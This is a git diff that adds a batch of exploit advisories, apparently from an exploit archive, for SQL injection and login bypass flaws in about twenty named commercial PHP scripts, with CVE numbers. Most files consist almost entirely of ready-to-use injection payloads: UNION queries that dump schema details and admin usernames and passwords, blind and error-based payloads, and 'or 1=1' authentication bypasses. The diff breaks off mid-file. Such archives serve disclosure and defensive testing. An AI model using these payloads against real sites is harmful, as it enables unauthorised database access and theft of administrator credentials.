http://www.nicephpscripts.com/ +# Software http://www.nicephpscripts.com/demo_php_script-PHP-FAQ-Script-Knowledgebase-Script.htm +# Demo: http://www.nicephpscripts.com/scripts/faqscript/ +# Version: N/A +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15988 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?nice_theme=[SQL] +# +# Parameter: nice_theme (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: nice_theme=3 AND 5083=5083 +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43072.txt b/platforms/php/webapps/43072.txt new file mode 100755 index 000000000..c5cd593d3 --- /dev/null +++ b/platforms/php/webapps/43072.txt @@ -0,0 +1,49 @@ +# # # # # +# Exploit Title: Fake Magazine Cover Script - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://www.websitescripts.org/ +# Software Link: http://www.websitescripts.org/website-scripts/fake-magazine-cover-script/prod_81.html +# Demo: http://websitescripts.org/demo/magazinecoverscript/ +# Version: N/A +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15987 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/rate.php?value=[SQL] +# +# -1047+/*!00005UniOn*/+/*!00005SelEct*/+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),2--+- +# +# http://localhost/[PATH]/content.php?id=[SQL] +# +# -237+/*!00005UNION*/+/*!00005SELECT*/+1,2,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8,9,10,11,12,13--+- +# +# Parameter: value (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: value=1047 AND 6465=6465 +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: value=1047 AND SLEEP(5) +# +# Parameter: id (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: id=237 AND 1343=1343 +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: id=237 AND SLEEP(5) +# +# Etc.. +# # # # # diff --git a/platforms/php/webapps/43073.txt b/platforms/php/webapps/43073.txt new file mode 100755 index 000000000..c35aec6ef --- /dev/null +++ b/platforms/php/webapps/43073.txt @@ -0,0 +1,29 @@ + +
+ + + +
diff --git a/platforms/php/webapps/43074.txt b/platforms/php/webapps/43074.txt new file mode 100755 index 000000000..548f408f3 --- /dev/null +++ b/platforms/php/webapps/43074.txt @@ -0,0 +1,44 @@ +# # # # # +# Exploit Title: Basic B2B Script - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://www.phpscriptsmall.com/ +# Software Link: http://www.exclusivescript.com/product/nC3F4570353/php-scripts/basic-b2b-script +# Demo: http://readymadeb2bscript.com/product/entrepreneur/ +# Version: N/A +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15985 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/product_view1.php?pid=[SQL] +# +# -19'++/*!03333UNION*/+/*!03333SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,(/*!03333Select*/+export_set(5,@:=0,(/*!03333select*/+count(*)/*!03333from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!03333table_name*/,0x3c6c693e,2),/*!03333column_name*/,0xa3a,2)),@,2)),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+- +# +# http://localhost/[PATH]/productcompanyinfo.php?id=[SQL] +# +# +# Parameter: pid (GET) +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: pid=19' AND SLEEP(5) AND 'zgOs'='zgOs +# +# Parameter: id (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: id=309' AND 2824=2824 AND 'AWCd'='AWCd +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: id=309' AND SLEEP(5) AND 'BTCw'='BTCw +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43075.txt b/platforms/php/webapps/43075.txt new file mode 100755 index 000000000..0f9a7d61b --- /dev/null +++ b/platforms/php/webapps/43075.txt @@ -0,0 +1,36 @@ +# # # # # +# Exploit Title: Creative Management System - CMS Lite 1.4 - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://bekirk.co.uk/ +# Software Link: https://codecanyon.net/item/creative-management-system-cms-lite/15297597 +# Demo: http://demo.bekirk.co.uk/ +# Version: 1.4 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15984 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?S=[SQL] +# +# '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x3a,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))),0)--+- +# +# Parameter: S (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: S=BeDark' AND 7998=7998 AND 'QNRN'='QNRN +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: S=BeDark' AND SLEEP(5) AND 'DmYc'='DmYc +# +# Etc.. +# # # # # diff --git a/platforms/php/webapps/43076.txt b/platforms/php/webapps/43076.txt new file mode 100755 index 000000000..253cef16e --- /dev/null +++ b/platforms/php/webapps/43076.txt @@ -0,0 +1,31 @@ +# # # # # +# Exploit Title: MyMagazine Magazine & Blog CMS 1.0 - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://geniusocean.com/ +# Software Link: https://codecanyon.net/item/mymagazine-bootstrap-newspaper-magazine-and-blog-cms-script/19620468 +# Demo: http://demo.geniusocean.com/mymagazine/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15983 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/admin_process.php?act=vdoeditform&id=[SQL] +# +# -1'++/*!50000UNION*/+/*!50000SELECT*/+0x31,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),VersiON(),0x34,0x35,0x36--+- +# +# http://localhost/[PATH]/admin/admin_process.php?act=cateditform&id=[SQL] +# +# -1'++/*!00022UNION*/+/*!00022SELECT*/+0x31,/*!00022cOnCat*/(username,0x3a,password),0x33,0x34,0x35+/*!00022From*/+admin--+- +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43077.txt b/platforms/php/webapps/43077.txt new file mode 100755 index 000000000..3b66b4d86 --- /dev/null +++ b/platforms/php/webapps/43077.txt @@ -0,0 +1,31 @@ +# # # # # +# Exploit Title: News Magazine & Blog CMS 1.0 - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://geniusocean.com/ +# Software Link: https://codecanyon.net/item/news-dynamic-newspaper-magazine-and-blog-cms-script/19656143 +# Demo: http://demo.geniusocean.com/news/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15982 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/admin_process.php?act=vdoeditform&id=[SQL] +# +# -1'++/*!50000UNION*/+/*!50000SELECT*/+0x31,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),VersiON(),0x34,0x35,0x36--+- +# +# http://localhost/[PATH]/admin/admin_process.php?act=cateditform&id=[SQL] +# +# -1'++/*!00022UNION*/+/*!00022SELECT*/+0x31,/*!00022cOnCat*/(username,0x3a,password),0x33,0x34,0x35+/*!00022From*/+admin--+- +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43078.txt b/platforms/php/webapps/43078.txt new file mode 100755 index 000000000..b73a71bc1 --- /dev/null +++ b/platforms/php/webapps/43078.txt @@ -0,0 +1,31 @@ +# # # # # +# Exploit Title: Newspaper Magazine & Blog CMS 1.0 - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://geniusocean.com/ +# Software Link: https://codecanyon.net/item/mymagazine-fully-responsive-magazine-cms/19493325 +# Demo: http://demo.geniusocean.com/newspaper/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15981 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/admin/admin_process.php?act=editpollform&id=[SQL] +# +# -2'++/*!00022UNION*/+/*!00022SELECT*/+0x31,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x33,0x34,0x35,VerSiOn(),dAtAbAsE(),0x38,0x39,0x3130,0x3131,0x3132--+- +# +# http://localhost/[PATH]/admin/admin_process.php?act=cateditform&id=[SQL] +# +# -2'++/*!00022UNION*/+/*!00022SELECT*/+0x31,/*!00022cOnCat*/(username,0x3a,password),0x33,0x34,0x35+/*!00022from*/+admin--+- +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43079.txt b/platforms/php/webapps/43079.txt new file mode 100755 index 000000000..86b142a21 --- /dev/null +++ b/platforms/php/webapps/43079.txt @@ -0,0 +1,32 @@ +# # # # # +# Exploit Title: US Zip Codes Database Script - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://rowindex.com/ +# Software Link: https://www.codester.com/items/4898/us-zip-codes-database-php-script +# Demo: http://rowindex.com/demo/ +# Version: N/A +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15980 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?action=lookup-county&state=[SQL] +# +# 11'+/*!08888UniOn*/+/*!08888Select*/+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+- +# +# Parameter: state (GET) +# Type: UNION query +# Title: Generic UNION query (NULL) - 1 column +# Payload: action=lookup-county&state=' UNION ALL SELECT CONCAT(0x716a717071,0x766a414e736e79524546725053474f72754d764a4772697a65666a7551464b46435141414d4e616c,0x7170707071)-- hvbM +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43080.txt b/platforms/php/webapps/43080.txt new file mode 100755 index 000000000..18dff5b48 --- /dev/null +++ b/platforms/php/webapps/43080.txt @@ -0,0 +1,30 @@ +# # # # # +# Exploit Title: Shareet - Photo Sharing Social Network - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: https://odallated.com/ +# Software Link: https://www.codester.com/items/4910/shareet-photo-sharing-social-network +# Demo: https://odallated.com/shareet/demo/ +# Version: N/A +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15979 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/?photo=[SQL] +# +# Parameter: photo (GET) +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: photo=saSihSiRf1E' AND SLEEP(5) AND 'DUqs'='DUqs +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43081.txt b/platforms/php/webapps/43081.txt new file mode 100755 index 000000000..419e41ef2 --- /dev/null +++ b/platforms/php/webapps/43081.txt @@ -0,0 +1,36 @@ +# # # # # +# Exploit Title: AROX School ERP PHP Script - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://arox.in/ +# Software Link: https://www.codester.com/items/4908/arox-school-erp-php-script +# Demo: http://erp1.arox.in/ +# Version: CVE-2017-15978 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/office_admin/?pid=95&action=print_charactercertificate&id=[SQL] +# http://localhost/[PATH]/office_admin/?pid=95&action=edit&id=3[SQL] +# +# Parameter: id (GET) +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: pid=95&action=print_charactercertificate&id=3 AND SLEEP(5) +# +# Parameter: id (GET) +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: pid=95&action=edit&id=3 AND SLEEP(5) +# +# Etc.. +# # # # # diff --git a/platforms/php/webapps/43082.txt b/platforms/php/webapps/43082.txt new file mode 100755 index 000000000..91573bf80 --- /dev/null +++ b/platforms/php/webapps/43082.txt @@ -0,0 +1,46 @@ + +
+
+ + + + + + + + + +

Username

 +
Password +
+
+ +
diff --git a/platforms/php/webapps/43083.txt b/platforms/php/webapps/43083.txt new file mode 100755 index 000000000..b9fd9d8a5 --- /dev/null +++ b/platforms/php/webapps/43083.txt @@ -0,0 +1,40 @@ +# # # # # +# Exploit Title: ZeeBuddy 2x - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://www.zeescripts.com/ +# Software Link: http://www.zeebuddy.com/ +# Demo: http://www.zeebuddy.com/demo/ +# Version: 2x +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15976 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/admin/editadgroup.php?groupid=[SQL] +# +# -1++/*!00009UNION*/+/*!00009SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,(SELECT+GROUP_CONCAT(0x557365726e616d653a,name,0x3c62723e,0x50617373776f72643a,pwd+SEPARATOR+0x3c62723e)+FROM+admin)--+- +# +# Parameter: groupid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: groupid=1 AND 3188=3188 +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: groupid=1 AND SLEEP(5) +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 9 columns +# Payload: groupid=1 UNION ALL SELECT CONCAT(0x71707a7071,0x754642515970647855775a494a486368477a6e45755355495050634270466969495966676b78536c,0x7162767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oMUM +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43084.txt b/platforms/php/webapps/43084.txt new file mode 100755 index 000000000..6f19c8fe4 --- /dev/null +++ b/platforms/php/webapps/43084.txt @@ -0,0 +1,34 @@ +# # # # # +# Exploit Title: Vastal I-Tech Dating Zone 0.9.9 - 'product_id' Parameter SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://vastal.com/ +# Software http://vastal.com/dating-zone-the-dating-software.html +# Demo: http://datingzone.vastal.com/demo/ +# Version: 0.9.9 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15975 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/add_to_cart.php?product_id=[SQL] +# +# Parameter: product_id (GET) +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: product_id=3 AND (SELECT 5917 FROM(SELECT COUNT(*),CONCAT(0x7176626a71,(SELECT (ELT(5917=5917,1))),0x71716b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: product_id=3 AND SLEEP(5) +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43085.txt b/platforms/php/webapps/43085.txt new file mode 100755 index 000000000..b1df8d8a1 --- /dev/null +++ b/platforms/php/webapps/43085.txt @@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: tPanel 2009 - Authentication Bypass +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://www.datacomponents.net/ +# Software Link: http://www.datacomponents.net/products/hosting/tpanel/ +# Demo: http://demo.datacomponents.net/tpanel/ +# Version: 2009 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15974 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# +# http://localhost/[PATH]/login.php +# +# User: 'or 1=1 or ''=' Pass: anything +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43086.txt b/platforms/php/webapps/43086.txt new file mode 100755 index 000000000..f7a68f786 --- /dev/null +++ b/platforms/php/webapps/43086.txt @@ -0,0 +1,44 @@ +# # # # # +# Exploit Title: Sokial Social Network Script 1.0 - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://www.sokial.net/ +# Software http://www.sokial.net/demonstrations-social-network.sk +# Demo: http://demo.sokial.net/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15973 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/admin/members_view.php?id=[SQL] +# +# 2271+aND(/*!00033SelEcT*/+0x30783331+/*!00033frOM*/+(/*!00033SelEcT*/+cOUNT(*),/*!00033cOnCaT*/((/*!00033sELECT*/(/*!00033sELECT*/+/*!00033cOnCaT*/(cAST(dATABASE()+aS+/*!00033cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00033FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00033wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00033rAND*/(0)*2))x+/*!00033FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00033aNd*/+1=1 +# +# Parameter: id (GET) +# Type: boolean-based blind +# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause +# Payload: id=2271 RLIKE (SELECT (CASE WHEN (8371=8371) THEN 2271 ELSE 0x28 END)) +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: id=2271 AND (SELECT 9357 FROM(SELECT COUNT(*),CONCAT(0x7176716a71,(SELECT (ELT(9357=9357,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) +# +# Type: stacked queries +# Title: MySQL > 5.0.11 stacked queries (comment) +# Payload: id=2271;SELECT SLEEP(5)# +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 OR time-based blind +# Payload: id=2271 OR SLEEP(5) +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43087.txt b/platforms/php/webapps/43087.txt new file mode 100755 index 000000000..3b891705f --- /dev/null +++ b/platforms/php/webapps/43087.txt @@ -0,0 +1,32 @@ +# # # # # +# Exploit Title: SoftDatepro Dating Social Network 1.3 - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://www.softdatepro.com/ +# Software Link: https://codecanyon.net/item/softdatepro-build-your-own-dating-social-network/3650044 +# Demo: http://demo.softdatepro.com/ +# Version: 1.3 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15972 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/viewprofile.php?profid=[SQL] +# http://localhost/[PATH]/viewmessage.php?sender_id=[SQL] +# +# -263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)whErE@:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+- +# +# http://localhost/[PATH]/admin +# +# Email: 'or 1=1 or ''=' Pass: anything +# +# Etc.. +# # # # # diff --git a/platforms/php/webapps/43088.txt b/platforms/php/webapps/43088.txt new file mode 100755 index 000000000..48278ec14 --- /dev/null +++ b/platforms/php/webapps/43088.txt @@ -0,0 +1,32 @@ +# # # # # +# Exploit Title: Same Sex Dating Software Pro 1.0 - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://www.softdatepro.com/ +# Software Link: https://codecanyon.net/item/same-date-pro-same-sex-dating-software/4530959 +# Demo: http://www.ss.softdatepro.com/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15971 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an users to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/viewprofile.php?profid=[SQL] +# http://localhost/[PATH]/viewmessage.php?sender_id=[SQL] +# +# -263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)whErE@:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+- +# +# http://localhost/[PATH]/admin +# +# Email: 'or 1=1 or ''=' Pass: anything +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43089.txt b/platforms/php/webapps/43089.txt new file mode 100755 index 000000000..fd9db24bf --- /dev/null +++ b/platforms/php/webapps/43089.txt @@ -0,0 +1,34 @@ +# # # # # +# Exploit Title: PHP CityPortal 2.0 - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://www.phpcityportal.com/ +# Software Link: http://www.phpcityportal.com/index.php +# Demo: http://phpcityportal.com/demo +# Version: 2.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15970 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?page=news&nid=[SQL] +# +# Parameter: cat (GET) +# Type: boolean-based blind +# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT) +# Payload: cat=1' OR NOT 6616=6616# +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 OR time-based blind +# Payload: cat=1' OR SLEEP(5)-- cCQQ +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43090.txt b/platforms/php/webapps/43090.txt new file mode 100755 index 000000000..56ff06c9f --- /dev/null +++ b/platforms/php/webapps/43090.txt @@ -0,0 +1,107 @@ +# # # # # +# Exploit Title: PG All Share Video 1.0 - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://www.pilotgroup.net/ +# Software Link: http://www.allsharevideo.com/features.php +# Demo: http://demo.allsharevideo.com/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15969 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/search/tag/[SQL] +# http://localhost/[PATH]/friends/index/1[SQL] +# http://localhost/[PATH]/users/profile/1[SQL] +# http://localhost/[PATH]/video_catalog/category/1[SQL] +# +# 'ANd(/*!06666seleCt+*/1/*!06666frOm*/(/*!06666seleCt*/%20COunt(*),/*!06666COnCAt*/((seleCt(seleCt+COnCAt(CAst(dAtAbAse()As%20ChAr),0x7e,0x496873616E53656e63616e))%20frOm%20infOrmAtiOn_sChemA.tAbles%20where%20tAble_sChemA=dAtAbAse()%20limit%200,1),flOOr(rAnd(0)*2))x%20frOm%20infOrmAtiOn_sChemA.tAbles%20grOup%20by%20x)A)%20AnD%20''=' +# +# Parameter: #1* (URI) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: http://localhost/[PATH]/search/tag/VerAyari' AND 2686=2686 AND 'UsmZ'='UsmZ +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: http://localhost/[PATH]/search/tag/VerAyari' AND (SELECT 4572 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(4572=4572,1))),0x716b627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'iudq'='iudq +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: http://localhost/[PATH]/search/tag/VerAyari' AND SLEEP(5) AND 'iczN'='iczN +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 3 columns +# Payload: http://localhost/[PATH]/search/tag/VerAyari' UNION ALL SELECT NULL,NULL,CONCAT(0x71717a6a71,0x4b6e4a524653614e47727a4f4464575253424c4d6c544f6b6a78454e4a756c75794d6a7765697269,0x716b627871)-- mAFc +# +# Parameter: #1* (URI) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: http://localhost/[PATH]/channels/category/7' AND 4239=4239 AND 'oXBo'='oXBo +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: http://localhost/[PATH]/channels/category/7' AND (SELECT 4458 FROM(SELECT COUNT(*),CONCAT(0x7170626b71,(SELECT (ELT(4458=4458,1))),0x7176787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JBxT'='JBxT +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 3 columns +# Payload: http://localhost/[PATH]/channels/category/7' UNION ALL SELECT NULL,NULL,CONCAT(0x7170626b71,0x574355636a666d516c4d437a78696a5a6243555a46486f494a45455a6c49574e577765704a496367,0x7176787071)-- kJpu +# +# Parameter: #1* (URI) +# Type: boolean-based blind +# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause +# Payload: 